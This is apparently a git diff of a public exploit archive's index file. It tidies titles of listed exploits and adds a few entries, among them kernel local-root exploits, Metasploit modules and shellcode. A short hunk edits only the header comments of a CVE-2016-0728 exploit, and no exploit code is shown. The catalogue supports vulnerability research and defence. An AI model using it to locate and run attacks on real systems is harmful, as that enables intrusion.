diff --git a/files.csv b/files.csv
index f1908ee12..80646c465 100755
--- a/files.csv
+++ b/files.csv
@@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947
 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
-778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
+778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80
@@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0
 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0
 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
-895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
+895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
@@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port
 5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
 5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0
-5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
+5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0
 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0
 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0
@@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
-9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
+9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
-9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0
+9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
@@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
-9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0
+9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0
 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
-9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0
+9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port
 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
-9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
+9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port
 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
-15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
+15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port
 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0
 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0
-17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
+17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0
 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0
 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0
 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0
@@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port
 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0
 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0
 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0
-19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
-19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0
+19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
+19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0
 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0
 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0
@@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port
 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
-33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
+33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
-39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0
+39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0
+40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
-39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
-39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
+39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
+39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
-39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
+39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21
 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
 39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - 
Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
@@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port
 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
-39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
+39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port
 39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0
 39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80
 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0
-39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460
+39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0
 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80
@@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port
 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
-39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443
+39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443
 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
@@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port
 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
 39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
-39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
+39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
 39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
 39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
-39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604
+39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604
 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0
 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
@@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port
 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80
+39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
+40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
+40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0
diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c
index bcee599b4..1e3e01f7a 100755
--- a/platforms/linux/local/39277.c
+++ b/platforms/linux/local/39277.c
@@ -5,12 +5,10 @@ # CVE : CVE-2016-0728 */
-/* CVE-2016-0728 local root exploit
- modified by Federico Bento to read kernel symbols from /proc/kallsyms
- props to grsecurity/PaX for preventing this in so many ways
+/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
+/* $ ./cve_2016_072 PP_KEY */
- $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
- $ ./cve_2016_072 PP_KEY */
+/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */ #include #include
